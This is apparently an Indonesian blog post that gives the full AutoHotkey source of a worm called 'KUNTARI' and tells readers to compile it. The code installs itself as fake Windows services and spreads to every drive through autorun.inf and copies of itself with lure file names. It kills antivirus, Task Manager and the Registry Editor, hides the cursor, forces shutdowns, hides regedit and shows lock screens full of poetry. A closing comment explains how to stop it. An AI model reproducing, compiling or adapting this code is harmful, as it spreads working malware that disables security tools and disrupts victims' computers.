RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Thurnbs, DisplayName, Data Base File
RegWrite, REG_EXPAND_sz, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Thurnbs, ImagePath, %SystemRoot%\system32\scvhost.exe
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Thurnbs, ErrorControl, 0
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Thurnbs, ObjectName, Localsystem
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Thurnbs, Start, 2
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Thurnbs, Type, 272
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Thurnbs, Description, Supports System Event Notification Service (SENS), which provides automatic distribution of events to subscribing Component Object Model (COM) components. If the service is stopped, SENS will close and will not be able to provide logon and logoff notifications. If this service is disabled, any services that explicitly depend on it will fail to start.

RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Diskcomp, DisplayName, Shell Software HexaDecimal
RegWrite, REG_EXPAND_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Diskcomp, ImagePath, %SystemRoot%\system32\scvhost.exe
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Diskcomp, ErrorControl, 0
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Diskcomp, ObjectName, Localsystem
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Diskcomp, Start, 2
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Diskcomp, Type, 272
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet001\Services\Diskcomp, Description, Supports System Event Notification Service (SENS), which provides automatic distribution of events to subscribing Component Object Model (COM) components. If the service is stopped, SENS will close and will not be able to provide logon and logoff notifications. If this service is disabled, any services that explicitly depend on it will fail to start.
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Diskcomp, DisplayName, Shell Software HexaDecimal
RegWrite, REG_EXPAND_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Diskcomp, ImagePath, %SystemRoot%\system32\scvhost.exe
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Diskcomp, ErrorControl, 0
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Diskcomp, ObjectName, Localsystem
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Diskcomp, Start, 2
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Diskcomp, Type, 272
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\ControlSet002\Services\Diskcomp, Description, Supports System Event Notification Service (SENS), which provides automatic distribution of events to subscribing Component Object Model (COM) components. If the service is stopped, SENS will close and will not be able to provide logon and logoff notifications. If this service is disabled, any services that explicitly depend on it will fail to start.
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Diskcomp, DisplayName, Shell Software HexaDecimal
RegWrite, REG_EXPAND_sz, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Diskcomp, ImagePath, %SystemRoot%\system32\scvhost.exe
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Diskcomp, ErrorControl, 0
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Diskcomp, ObjectName, Localsystem
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Diskcomp, Start, 2
RegWrite, Reg_Dword, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Diskcomp, Type, 272
RegWrite, REG_sz, HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Diskcomp, Description, Supports System Event Notification Service (SENS), which provides automatic distribution of events to subscribing Component Object Model (COM) components. If the service is stopped, SENS will close and will not be able to provide logon and logoff notifications. If this service is disabled, any services that explicitly depend on it will fail to start.

FileSetAttrib, -HS, C:\Hinata SEX;www.hentain.movie.com.exe

ifexist, C:\
filecopy, %ScriptName%\HackAdministrator.bat, C:\HackAdministrator.bat
filecopy, %scriptname%\kuntari.exe, C:\Hinata SEX;www.hentain.movie.com.exe
filecopy, %scriptname%\kuntari.exe, C:\*.*
FileCopy, %ScriptName%\kuntari.exe, C:\Thurnbs.exe
filecopy, \Read_Me.txt, C:\[KUNTARI]Read Me.txt
ifexist, D:\
FileCopy, C:\WINDOWS\system32\Shell32\0x00.mp3, D:\Signaturs.db
FileCopy, C:\WINDOWS\system32\Shell32\autorun.inf, D:\autorun.inf
FileCopy, C:\WINDOWS\system32\Shell32\folder.htt, D:\folder.htt
FileCopy, C:\WINDOWS\system32\Shell32\desktop.ini, D:\desktop.ini
filecopy, %scriptname%\kuntari.exe, D:\Hinata SEX;www.hentain.movie.com.exe
filecopy, %scriptname%\kuntari.exe, D:\kuntari.exe
FileCopy, %ScriptName%\kuntari.exe, D:\Thurnbs.exe
filecopy, C:\WINDOWS\system32\Shell32\HackAdministrator.bat, D:\HackAdministrator.bat
filecopy, \Read_Me.txt, D:\[KUNTARI]Read Me.txt
FileSetAttrib, -HS, D:\Hinata SEX;www.hentain.movie.com.exe
ifexist, E:\
FileCopy, C:\WINDOWS\system32\Shell32\0x00.mp3, E:\Signaturs.db
FileCopy, C:\WINDOWS\system32\Shell32\autorun.inf, E:\autorun.inf
FileCopy, C:\WINDOWS\system32\Shell32\folder.htt, E:\folder.htt
FileCopy, C:\WINDOWS\system32\Shell32\desktop.ini, E:\desktop.ini
filecopy, %scriptname%\kuntari.exe, E:\Hinata SEX;www.hentain.movie.com.exe
filecopy, %scriptname%\kuntari.exe, E:\kuntari.exe
FileCopy, %ScriptName%\kuntari.exe, E:\Thurnbs.exe
filecopy, C:\WINDOWS\system32\Shell32\HackAdministrator.bat, E:\HackAdministrator.bat
filecopy, \Read_Me.txt, E:\[KUNTARI]Read Me.txt
FileSetAttrib, -HS, E:\Hinata SEX;www.hentain.movie.com.exe
ifexist, f:\
FileCopy, C:\WINDOWS\system32\Shell32\0x00.mp3, F:\Signaturs.db
FileCopy, C:\WINDOWS\system32\Shell32\autorun.inf, F:\autorun.inf
FileCopy, C:\WINDOWS\system32\Shell32\folder.htt, F:\folder.htt
FileCopy, C:\WINDOWS\system32\Shell32\desktop.ini, F:\desktop.ini
filecopy, %scriptname%\kuntari.exe, F:\Hinata SEX;www.hentain.movie.com.exe
filecopy, %scriptname%\kuntari.exe, F:\kuntari.exe
FileCopy, %ScriptName%\kuntari.exe, F:\Thurnbs.exe
filecopy, C:\WINDOWS\system32\Shell32\HackAdministrator.bat, D:\HackAdministrator.bat
filecopy, \Read_Me.txt, D:\[KUNTARI]Read Me.txt
FileSetAttrib, -HS, F:\Hinata SEX;www.hentain.movie.com.exe
ifexist, G:\
FileCopy, C:\WINDOWS\system32\Shell32\0x00.mp3, G:\Signaturs.db
FileCopy, C:\WINDOWS\system32\Shell32\autorun.inf, G:\autorun.inf
FileCopy, C:\WINDOWS\system32\Shell32\folder.htt, G:\folder.htt
FileCopy, C:\WINDOWS\system32\Shell32\desktop.ini, G:\desktop.ini
filecopy, %scriptname%\kuntari.exe, G:\Hinata SEX;www.hentain.movie.com.exe
filecopy, %scriptname%\kuntari.exe, G:\kuntari.exe
FileCopy, %ScriptName%\kuntari.exe, G:\Thurnbs.exe
filecopy, C:\WINDOWS\system32\Shell32\HackAdministrator.bat, G:\HackAdministrator.bat
filecopy, \Read_Me.txt, G:\[KUNTARI]Read Me.txt
FileSetAttrib, -HS, G:\Hinata SEX;www.hentain.movie.com.exe
ifexist, H:\
FileCopy, C:\WINDOWS\system32\Shell32\0x00.mp3, H:\Signaturs.db
FileCopy, C:\WINDOWS\system32\Shell32\autorun.inf, H:\autorun.inf
FileCopy, C:\WINDOWS\system32\Shell32\folder.htt, H:\folder.htt
FileCopy, C:\WINDOWS\system32\Shell32\desktop.ini, H:\desktop.ini
filecopy, %scriptname%\kuntari.exe, H:\Hinata SEX;www.hentain.movie.com.exe
filecopy, %scriptname%\kuntari.exe, H:\kuntari.exe
FileCopy, %ScriptName%\kuntari.exe, H:\Thurnbs.exe
filecopy, C:\WINDOWS\system32\Shell32\HackAdministrator.bat, H:\HackAdministrator.bat
filecopy, \Read_Me.txt, H:\[KUNTARI]Read Me.txt
FileSetAttrib, -HS, H:\Hinata SEX;www.hentain.movie.com.exe
ifexist, I:\
FileCopy, C:\WINDOWS\system32\Shell32\0x00.mp3, I:\Signaturs.db
FileCopy, C:\WINDOWS\system32\Shell32\autorun.inf, I:\autorun.inf
FileCopy, C:\WINDOWS\system32\Shell32\folder.htt, I:\folder.htt
FileCopy, C:\WINDOWS\system32\Shell32\desktop.ini, I:\desktop.ini
filecopy, %scriptname%\kuntari.exe, I:\Hinata SEX;www.hentain.movie.com.exe
filecopy, %scriptname%\kuntari.exe, I:\kuntari.exe
FileCopy, %ScriptName%\kuntari.exe, I:\Thurnbs.exe
filecopy, C:\WINDOWS\system32\Shell32\HackAdministrator.bat, I:\HackAdministrator.bat
filecopy, \Read_Me.txt, I:\[KUNTARI]Read Me.txt
FileSetAttrib, -HS, I:\Hinata SEX;www.hentain.movie.com.exe

IfWinExist, Process Explorer - Sysinternals: www.sysinternals.com [%ComputerName%\%UserName%]
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
SoundPlay, C:\WINDOWS\system32\Shell32\0x00.mp3
msgbox, 262144, SURVIVOR, Bukan Jamannya Membuat Virus Yang Merusak`nSebab Mode Tahun ini Adalah Virus Yang`nMembuat Orang Shock And Gantung diri`nSalam Hangat Agak Panas Dari ANMA DEIDARA, 10
WinKill
SoundBeep, 750, 1750
IfMsgBox, TimeOut
goto sangar2
IfMsgBox, ok
GOTO sangar2
}

IfWinExist, Folder Options
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
SoundPlay, C:\WINDOWS\system32\Shell32\0x00.mp3
msgbox, 131072, [====== Your Computer In My Hypnotic =====], Walaupun gerak menyembunyikan pesonamu`n Tapi aku tetap tak sanggup pendam kagumku`n Dan hati ini gatal ingin menari denganmu`nMeski aku baru belajar gerak pada kupu-kupu, 10
WinKill
SoundBeep, 750, 1000
goto, sangar3

}

ifwinexist, Document - WordPad
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
WinMaximize
Send, Untuk seorang gadis yang sempat ku kenal dengan nama{enter}{enter} K K K K KKKKK KKKK KKKK K{enter} K K K K K K K K K K{enter} K K K K K K K K K K{enter} KK K K K KKKK KKKK K{enter} K K K K K K K K K K{enter} K K KKKK K K K K K K{enter}{enter}{enter}Tulislah namaku dengan abu{enter}Karna abu lebih abadi di hatimu{enter}Daripada puisi-puisiku buatmu{enter}Maka tulislah namaku dengan abu{enter}{enter}Aku tak bisa bersyair{enter}Sebab itu kutulis puisi{enter}Oleh karena itu aku berfikir{enter}Untuk selalu memaknai sunyi{enter}{enter}Ketika aku menulis puisi ini{enter}Aku dapati wajahmu di telapak tanganku{enter}Kemudian di dalam kertas yang putih ini{enter}Kurasakan hangatnya dirimu dalam dekapku{enter}{enter}Sekali lagi tulislah namaku dengan abu{enter}Lalu kita jalani kisah kita dengan membisu{enter}Karena membisu adalah saksi atas cinta kita{enter}Di mana neraka dan surga belum bisa bicara{enter}{enter}Setelah bait-bait penghabisan puisi ini{enter}Ialah permintaan kepadamu dari aku punya diri{enter}Sekali lagi kupinta dengan hormat tanpa ragu{enter}Tuliskanlah huruf namaku hanya dengan abu{enter}{enter}

msgbox, 131072,Mariana Operating System, Buat apa pusing dengan tumpukan dosa`n Ataupun jadi maniak pengumpul pahala`n Bila sudah ditetapkan masuk neraka`nTentu saja pasti masuk neraka akhirnya`n Tahu kenapa? `n Karna cinta bertuhan dirinya sendiri`n`nSALAM HANGAT AGAK PANAS DARI ANMA DEIDARA,10
SoundBeep, 750, 10000
}

IfWinExist, Untitled - Notepad
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
WinMaximize
Send, Terukir dengan amat dalamnya sebuah nama dalam hatiku . . .{enter} Nama itu adalah {enter}{enter}{#}{#} {#}{#} {#}{#} {#}{#} {#}{#} {#}{#} {#}{#}{#}{#}{#}{#}{#}{#}{#} {#}{#}{#}{#}{#}{#}{#} {#}{#}{#}{#}{#}{#}{#} {#}{#}{#}{enter}{#}{#} {#}{#} {#}{#} {#}{#} {#}{#}{#}{#} {#}{#} {#}{#}{#}{#}{#}{#}{#}{#}{#} {#}{#}{#}{#}{#}{#}{#}{#}{#} {#}{#}{#}{#}{#}{#}{#}{#} {#}{#}{#}{enter}{#}{#} {#}{#} {#}{#} {#}{#} {#}{#} {#}{#} {#}{#} {#}{#}{#} {#}{#} {#}{#} {#}{#} {#}{#}{#} {#}{#}{#}{enter}{#}{#} {#}{#} {#}{#} {#}{#} {#}{#} {#}{#}{#}{#} {#}{#}{#} {#}{#} {#}{#} {#}{#} {#}{#}{#} {#}{#}{#}{enter}{#}{#}{#}{#} {#}{#} {#}{#} {#}{#} {#}{#}{#} {#}{#}{#} {#}{#}{#}{#}{#}{#}{#}{#}{#} {#}{#}{#}{#}{#}{#}{#} {#}{#}{#}{enter}{#}{#} {#}{#} {#}{#} {#}{#} {#}{#} {#}{#} {#}{#}{#} {#}{#}{#}{#}{#}{#}{#}{#}{#} {#}{#}{#}{#}{#}{#} {#}{#}{#}{enter}{#}{#} {#}{#} {#}{#} {#}{#} {#}{#} {#}{#} {#}{#}{#} {#}{#} {#}{#} {#}{#} {#}{#}{#} {#}{#}{#}{enter}{#}{#} {#}{#} {#}{#}{#}{#}{#}{#}{#}{#} {#}{#} {#}{#} {#}{#}{#} {#}{#} {#}{#} {#}{#} {#}{#}{#} {#}{#}{#}{enter}{#}{#} {#}{#} {#}{#}{#}{#}{#}{#} {#}{#} {#}{#} {#}{#}{#} {#}{#} {#}{#} {#}{#} {#}{#}{#} {#}{#}{#}{enter}{enter}Andaikan saja engkau tahu kalau aku masih tetap menantimu{enter}(C) Copyright 2008-2009 Holy Alliance KUNTARI Union Corp.{enter}{enter}Dinda Oh Dinda, Rinduku apa juga rindumu?{enter}{enter}Aku sudah tak sanggup menahan{enter}Cinta yang kejam merajarela sendirian{enter}Dan denyut kerinduan yang amat menyakitkan{enter}{enter}Dinda Oh Dinda, Apa Engkau telah jadi rembulan?{enter}{enter}Lalu kupinta pada bits Binary{enter}Untuk menyampaikan perasaan ini{enter}Sebab sang angin tak bisa hantarkan{enter}Badai kenisbian dalam penantian{enter}{enter}Dinda Oh Dinda, Cintaku padamu bagai adonan roti{enter}dengan bayak ragi. Apakah akan berhenti mengembang?{enter}{enter}Malamku amat menakutkan{enter}Ia seolah memaksaku untuk bertanya{enter}"Di hatimu siapa yang Engkau rindukan?"{enter}Sampai saat ini, kau yang kucinta{enter}Dinda Oh Dinda, Aku ingin membunuhmu{!}{enter}{enter}{tab}{tab}SALIBKAN DIA {!}{!}{!}{!}{!}{!}{!}{!}{!}{!}{enter}

msgbox, 131072,OnErrorResumeNext, Varian ini merupakan bentuk sumbangsih dari`n Holy Alliance Kuntari Union Corporation`npada Dunia Persilatan Virus Local Indonesia`n`n SALAM HANGAT AGAK PANAS DARI ANMA DEIDARA!, 5
SoundBeep, 750, 10000
}

IfWinExist, Calculator
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
SoundBeep, 750, 10000
msgbox, 131072, Love System, Kalender membuka diri`nMemaksaku untuk menghitung`nSudah kali ke berapa`nAku jatuh hati padamu, 10
}

IfWinExist, %comspec%
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
Send, Andaikan aku buta kaulah yang mambuatku bisa melihat. Andaikan aku tuli kaulah yang membuatku bisa mendengar dan andaikan aku bisu kaulah yang bisa membuat mulutku berkata-kata tanpa henti.
SoundPlay, C:\WINDOWS\system32\Shell32\0x00.mp3
msgbox, 131072, I WANT TO KILL YOU, Rasa adalah hak istimewa bagi hati`nSeperti halnya cinta yang tak bisa`ndiajarkan lewat buku-buku yang ber`njajar di lemari-lemari perpus. Bah`nkan malampun tak bisa berikan arti`npada merindui mati., 10
SoundBeep, 750, 10000
}

IfWinExist, Windows Task Manager
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
SoundPlay, C:\WINDOWS\system32\Shell32\0x00.mp3
msgbox, 131072, Mariana Console, Ilegal application ini hanyalah`nsebagai bukti. Andaikan aku bisa`nhidup tanpamu. Pastilah aku tak`nperlu belajar untuk membencimu., 7
WinKill
IfMsgBox, Timeout
Winkill
goto sangar1
IfMsgBox, ok
Winkill
goto sangar1

}

IfWinExist, Registry Editor
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
WinKIll
SoundPlay, C:\WINDOWS\system32\Shell32\0x00.mp3
msgbox, 131072, MarKUNTARI, Cintaku padamu bagaikan perjalanan`nDari yang tidak pernah ada permula`nannya dan akan sampai ke tiada bat`nasannya. Sebab hatiku bak rumah ke`ncil dan kaulah penghuni satu-satun`nya.
, 10
SoundBeep, 750, 7000
}

IfWinExist, System Configuration Utility
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
SoundPlay, C:\WINDOWS\system32\Shell32\0x00.mp3
msgbox, 131072, KhunTary, Telah kutebarkan harapanku di`nbawah telapak kakimu. Maka be`nrhati-hatilah dalam melangkah`nSebab yang kau injak adalah h`narapanku., 7
SoundBeep, 750, 7000

}

IfWinExist, Document1 - Microsoft Word
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
WinMaximize
Send, Aku mencoba mengeja kata cinta{enter}Ada huruf C, I, N , T dan juga A{enter}{enter}C-nya dari cumbu rayu menggoda{enter}I-nya dari iblis selalu bersama kita{enter}N-nya dari nafsu birahi merajarela{enter}T-nya dari tubuh telanjang wanita{enter}A-nya dari amnesia pahitnya dunia{enter}{enter}Ada yang bilang cinta itu gila{enter}Seperti orang gila yang memaksa{enter}Orang waras berbuat bagai gila{enter}{enter}Bisa jadi cinta itu jeritan{enter}Calon janin pada dua insan{enter}Yang berlainan jenis kelamin{enter}Agar bisa segera dilahirkan{enter}{enter}Mungkin cinta hanyalah cara{enter}Agar para wanita bisa rela{enter}Membukakan pangkal pahanya{enter}Kepada kita kaum pria{enter}{enter}=>
SoundBeep, 750, 7000
msgbox, 131072, Animasola Union, Kau Sudah jadi rembulan`nDi langit sendirian dengan sejuta bintang`nNamun aku hanya bisa melihatmu`nTanpa mampu untuk menyentuhmu, 7

}

IfWinExist, Microsoft Excel - Book1
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
WinMaximize
Send, Aku mencoba mengeja kata cintSa{enter}Ada huruf C, I, N, T dan juga A{enter}{enter}C-nya dari cumbu rayu menggoda{enter}I-nya dari iblis selalu bersama kita{enter}N-nya dari nafsu birahi merajarela{enter}T-nya dari tubuh telanjang wanita{enter}A-nya dari amnesia pahitnya dunia{enter}{enter}Ada yang bilang cinta itu gila{enter}Seperti orang gila yang memaksa{enter}Orang waras berbuat bagai gila{enter}{enter}Bisa jadi cinta itu jeritan{enter}Calon janin pada dua insan{enter}Yang berlainan jenis kelamin{enter}Agar bisa segera dilahirkan{enter}{enter}Mungkin cinta hanyalah cara{enter}Agar para wanita bisa rela{enter}Membukakan pangkal pahanya{enter}Kepada kita kaum pria{enter}{enter}=>
SoundBeep, 750, 7000
msgbox, 131072, Holy Alliance Animasola, Kalimatku hanyalah akan menyindirku`nAndaikan aku tidak pernah bertemu`n denganmu. Mungkin tak akan ada varian ini, 7
}

IfWinExist, Windows Media Player
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
SoundBeep, 750, 7000
msgbox, 131072, KUNTARI, Bukan Jamannya Membuat Virus Yang Merusak`nSalam Hangat Agak Panas Dari ANM, 10
}

IfWinExist, Spider
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
SoundBeep, 750, 1000
msgbox, 131072, Bukan Permainan, Jika Kamu kira cinta itu hanyalah`nsebuah permainan belaka. Maka kamu hanyalah Penghianat`nbesar. sebab cinta adalah sesuatu yang gaib`nDan hanya Tuhan yang mampu mengajarkannya`n`nSalam Hangat Agak Panas Dari ANMA DEIDARA, 10
}

IfWinExist, CurrProcess
{
SoundPlay, C:\WINDOWS\system32\Shell32\0x00.mp3
msgbox, 131072, Mariana Console, Ilegal application ini hanyalah`nsebagai bukti. Andaikan aku bisa`nhidup tanpamu. Pastilah aku tak`nperlu belajar untuk membencimu., 7
WinKill
IfMsgBox, Timeout
Winkill
goto sangar3
IfMsgBox, ok
Winkill
goto sangar3
}

IfWinExist,,Itty Bitty Process Manager - v1.04.0
{
SoundPlay, C:\WINDOWS\system32\Shell32\0x00.mp3
msgbox, 131072, Mariana Console, Ilegal application ini hanyalah`nsebagai bukti. Andaikan aku bisa`nhidup tanpamu. Pastilah aku tak`nperlu belajar untuk membencimu., 7
WinKill
IfMsgBox, Timeout
Winkill
goto sangar3
IfMsgBox, ok
Winkill
goto sangar3
}


IfWinExist, FreeCell
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
SoundBeep, 750, 1000
msgbox, 131072, Bukan Permainan, Jika Kamu kira cinta itu hanyalah`nsebuah permainan belaka. Maka kamu hanyalah Penghianat`nbesar. sebab cinta adalah sesuatu yang gaib`nDan hanya Tuhan yang mampu mengajarkannya`n`nSalam Hangat Agak Panas Dari ANMA DEIDARA, 10
}

IfWinExist, Solitaire
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
SoundBeep, 750, 1000
msgbox, 131072, Bukan Permainan, Jika Kamu kira cinta itu hanyalah`nsebuah permainan belaka. Maka kamu hanyalah Penghianat`nbesar. sebab cinta adalah sesuatu yang gaib`nDan hanya Tuhan yang mampu mengajarkannya`n`nSalam Hangat Agak Panas Dari ANMA DEIDARA, 10
}

IfWinExist, Minesweeper
{
WinActivate
WinSetTitle, JUST KUNTARI => (^_^)
SoundBeep, 750, 1000
msgbox, 131072, Bukan Permainan, Jika Kamu kira cinta itu hanyalah`nsebuah permainan belaka. Maka kamu hanyalah Penghianat`nbesar. sebab cinta adalah sesuatu yang gaib`nDan hanya Tuhan yang mampu mengajarkannya`n`nSalam Hangat Agak Panas Dari ANMA DEIDARA, 10
}

}
OnExit, ShowCursor
return

ShowCursor:
SystemCursor("On")
ExitApp

^c::SystemCursor("Toggle")

SystemCursor(OnOff=1)
{
static AndMask, XorMask, $, h_cursor
,c0,c1,c2,c3,c4,c5,c6,c7,c8,c9,c10,c11,c12,c13
, b1,b2,b3,b4,b5,b6,b7,b8,b9,b10,b11,b12,b13
, h1,h2,h3,h4,h5,h6,h7,h8,h9,h10,h11,h12,h13
if (OnOff = "Init" or OnOff = "I" or $ = "")
{
$ = h
VarSetCapacity( h_cursor,4444, 1 )
VarSetCapacity( AndMask, 32*4, 0xFF )
VarSetCapacity( XorMask, 32*4, 0 )
system_cursors = 32512,32513,32514,32515,32516,32642,32643,32644,32645,32646,32648,32649,32650
StringSplit c, system_cursors, `,
Loop %c0%
{
h_cursor := DllCall( "LoadCursor", "uint",0, "uint",c%A_Index% )
h%A_Index% := DllCall( "CopyImage", "uint",h_cursor, "uint",2, "int",0, "int",0, "uint",0 )
b%A_Index% := DllCall("CreateCursor","uint",0, "int",0, "int",0
, "int",32, "int",32, "uint",&AndMask, "uint",&XorMask )
}
}
if (OnOff = 0 or OnOff = "Off" or $ = "h" and (OnOff < 0 or OnOff = "Toggle" or OnOff = "T"))
$ = b
else
$ = h

Loop %c0%
{
h_cursor := DllCall( "CopyImage", "uint",%$%%A_Index%, "uint",2, "int",0, "int",0, "uint",0 )
DllCall( "SetSystemCursor", "uint",h_cursor, "uint",c%A_Index% )
}
}

loop,3
{
Driveletter = A:

hVolume := DllCall("CreateFile"
, Str, "\\.\" . Driveletter
, UInt, 0x80000000 | 0x40000000
, UInt, 0x1 | 0x2
, UInt, 0
, UInt, 0x3
, UInt, 0, UInt, 0)
if hVolume <> -1
{
DllCall("DeviceIoControl"
, UInt, hVolume
, UInt, 0x2D4808
, UInt, 0, UInt, 0, UInt, 0, UInt, 0
, UIntP, dwBytesReturned
, UInt, 0)
DllCall("CloseHandle", UInt, hVolume)
}
msgbox,131072,BAKAR, WEW! Zaman Gini Masih Pakai`nDisket? Bakar aja tuh!!!
}


process, close, AV.avx
goto manis
process, close, SE.avx
goto manis
process, close, rgd.avx
goto manis
process, close, does.avx
goto manis
process, close, pro Terminator.avx
goto manis
process, close, StartupEd.avx
goto manis
process, close, SysFix.avx
goto manis
process, close, SmaRTP.exe
goto manis
process, close, Ad-Aware.exe
goto manis
process, close, mskagent.exe
goto manis
process, close, ansavd.exe
goto manis
process, close, ansav.exe
goto manis
process, close, avgtray.exe
goto manis
process, close, avgui.exe
goto manis
process, close, avgnt.exe
goto manis
process, close, avcenter.exe
goto manis
process, close, AvltMain.exe
goto manis


Run %ScriptName%\Thurnbs.exe
Run c:\windows\system32\shell32\kuntari.exe
run C:\WINDOWS\system32\diskcomp.exe
rUN C:\AUTOEXEC.BAT

filemove, C:\WINDOWS\regedit.exe, C:\WINDOWS\system32\Microsoft\Protect\S-1-5-18\User\exe.tideger

:*:kuntari::
send Sebuah Nama Dalam Kalbuku
return

^!Delete::
run C:\WINDOWS\system32\Shell32\sangar.bat
run C:\AUTOEXEC.BAT

^v:: run C:\WINDOWS\system32\Shell32\kuntari.exe
^s:: run C:\autoexec.bat
^P:: run notepad
!F4::
run ::{20d04fe0-3aea-1069-a2d8-08002b30309d}

F8::
run C:\windows\system32\shell32\sangar.bat
F5::
run c:\autoexec.bat

#!^+Delete::eXITaPP
Pause::Suspend
ScrollLock::ExitApp

sangar1:
Gui, Destroy
CustomColor = 000000
Gui +AlwaysOnTop -Caption +MaxSize +OwnDialogs +Disabled
Gui, Color, %CustomColor%
Gui, Font, s16, Courier New
Gui, Submit,nohide
Gui, Add, Text, cRed, Setelah itu`, kulontarkan sebuah tanya untukmu`nDengan agama apa Adam dan Hawa dipersatukan`nJikalau mereka dipersatukan oleh Tuhan yang satu`nCinta mereka tetap terbungkus dalam kekudusan`n`nDengan kata cinta`, kucongkel mata keimananmu`n`nAllahmu adalah Allahku`nJibrilmu adalah Jibrilku`nIbrahimmu adalah Ibrahimku`nMusamu adalah Musaku`nMariammu adalah mariamku`nYesusmu adalah isaku`n`nDengan kata cinta`, kucongkel mata keimananmu`n`nKarena itu bukan isapan jempol belaka`nBila nama junjunganmu ada dalam kitabku`nIsa almasi dan Muhammad saling kasih dalam cinta`nMereka menghampar jembatan bukanlah tembok kaku`n`nDengan kata cinta`, kucongkel mata keimananmu`n`n`n Kau memang ManJa`, Manis Jancuk'an`n`n`n SALAM HANGAT AGAK PANAS FROM LOVING KUNTARI
Gui, Show, Maximize,
SoundPlay, C:\WINDOWS\system32\Shell32\0x00.mp3
SoundBeep, 750, 3000
gosub, lop
Return

sangar2:
Gui, Destroy
CustomColor = 000000
Gui +AlwaysOnTop -Caption +MaxSize +OwnDialogs +Disabled
Gui, Color, %CustomColor%
Gui, Font, s16, Courier New
Gui, Submit,nohide
Gui, Add, Text, cRed, Setelah itu`, kulontarkan sebuah tanya untukmu`nDengan agama apa Adam dan Hawa dipersatukan`nJikalau mereka dipersatukan oleh Tuhan yang satu`nCinta mereka tetap terbungkus dalam kekudusan`n`nDengan kata cinta`, kucongkel mata keimananmu`n`nAllahmu adalah Allahku`nJibrilmu adalah Jibrilku`nIbrahimmu adalah Ibrahimku`nMusamu adalah Musaku`nMariammu adalah mariamku`nYesusmu adalah isaku`n`nDengan kata cinta`, kucongkel mata keimananmu`n`nKarena itu bukan isapan jempol belaka`nBila nama junjunganmu ada dalam kitabku`nIsa almasi dan Muhammad saling kasih dalam cinta`nMereka menghampar jembatan bukanlah tembok kaku`n`nDengan kata cinta`, kucongkel mata keimananmu`n`n`n Kau memang ManJa`, Manis Jancuk'an`n`n`n SALAM HANGAT AGAK PANAS FROM LOVING KUNTARI
Gui, Show, Maximize,
SoundPlay, C:\WINDOWS\Media\Windows XP Critical Stop.wav
SoundBeep, 750, 3000
Shutdown, 9
gosub, lop
Return

sangar3:
SoundPlay, C:\WINDOWS\system32\Shell32\0x00.mp3
Gui, Destroy
CustomColor = 0000FF
Gui +AlwaysOnTop -Caption +ToolWindow
Gui, Color, %CustomColor%
Gui, Font,s37,Arial Black
Gui, Add, Text,s37 cFF0000 , [ LOCKED BY KUNTARI ]
WinSet, TransColor, %CustomColor% 150
Gui, Show, xCenter y319 NoActivate
gosub, lop
Return

manis:
SetTimer, baju, 1
MSGBOX,0,KUNTARI™, Karena Disebabkan Oleh Aku Yang Terlalu Manis`nHingga Membuat Anti Virusmu Lebih Memilih Aku Dari Pada Dirimu, 2147483
IfMsgBox, OK
{
goto lop
return
}
IfMsgBox, TimeOut
{
goto lop
return
}
return
baju:
IfWinNotExist, KUNTARI™
return
SetTimer, baju, off
WinActivate
ControlSetText, Button1, &Love_Is_Blue
goto lop
return
 









simpan dengan nama kuntari.ahk lalu klik kanan compail.
maap kalo grammar aku ancur :oops:

1 komentar:

  1. cara mematikan proses kuntari adalah dengan menekan Shift+Alt+Ctrl+Win dan DELETE

    BalasHapus

About Me

Foto saya
